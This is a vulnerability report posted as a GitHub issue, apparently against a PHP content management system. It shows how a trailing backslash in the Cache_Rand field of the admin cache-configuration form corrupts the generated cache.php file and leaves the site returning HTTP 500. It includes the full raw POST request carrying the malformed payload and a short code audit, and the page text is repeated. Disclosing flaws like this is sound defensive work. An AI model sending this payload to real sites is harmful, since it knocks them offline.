You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Hello, we found that your project has a denial of service vulnerability. Details are as follows.
Vulnerability Function Point
The function point exists in Backend management interface ->System Configuration->Cache Configuration->Cache security characters
Vulnerability details
Httpraw packet
POST /admin.php/setting/cache_save HTTP/1.1
Host: 172.20.10.3:81
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 297
Origin: http://172.20.10.3:81
Connection: close
Referer: http://172.20.10.3:81/admin.php/setting/cache
Cookie: mc_admin_id=972crMx4oruLsvSMuCQXg89E59IOc1gCMu4UbgT2; mc_admin_nichen=60e3ZaYNY8XyAN56ivxQjLyJIwtpFNMFPD2rXUJoIUJazlazXN4; mc_admin_login=89f0uw62E0x-cUBqH1lgtD4EbEsdytBZGLWhBDRRiwv2iT0vaJpingm4ylkt8PD4ndhPfLzwoCgMerpjnw
Cache_Mode=0&Cache_Rand=ygmjqw7jpia4aughbhj%5C&Cache_Mem_Ip=127.0.0.1a%2F%2F%2F%E9%8E%88'%22%5C(&Cache_Mem_Port=11211&Cache_Mem_Pass=()&Cache_Redis_Ip=127.0.0.1&Cache_Redis_Port=6379&Cache_Redis_Pass=()&Cache_Time_Index=1800&Cache_Time_List=3600&Cache_Time_Show=1&Cache_Time_Pic=3600&Cache_Time=72
When I add the “\” character after the Cache_Rand parameter, it can cause the site to not work properly.As you can see in the screenshot below, when you visit the website now, the response status code is already 500 and the website is no longer working properly.
Code audit
According to the function route, we can locate the "sys/apps/controllers/admin/Setting.php" file,Based on the function route, we can locate the cache_save function in the sys/apps/controllers/admin/Setting.php file.The Cache_Rand parameter passed in by the user is written to the cache.php file.
Then we open the “sys/libs/cache.php” file.You can see that the “\” symbol is used as an escape character to escape the “'”symbol.
The text was updated successfully, but these errors were encountered:
Hello, we found that your project has a denial of service vulnerability. Details are as follows.
Vulnerability Function Point
The function point exists in Backend management interface ->System Configuration->Cache Configuration->Cache security characters
Vulnerability details
Httpraw packet
When I add the “\” character after the Cache_Rand parameter, it can cause the site to not work properly.As you can see in the screenshot below, when you visit the website now, the response status code is already 500 and the website is no longer working properly.
According to the function route, we can locate the "sys/apps/controllers/admin/Setting.php" file,Based on the function route, we can locate the cache_save function in the sys/apps/controllers/admin/Setting.php file.The Cache_Rand parameter passed in by the user is written to the cache.php file.
Then we open the “sys/libs/cache.php” file.You can see that the “\” symbol is used as an escape character to escape the “'”symbol.The text was updated successfully, but these errors were encountered: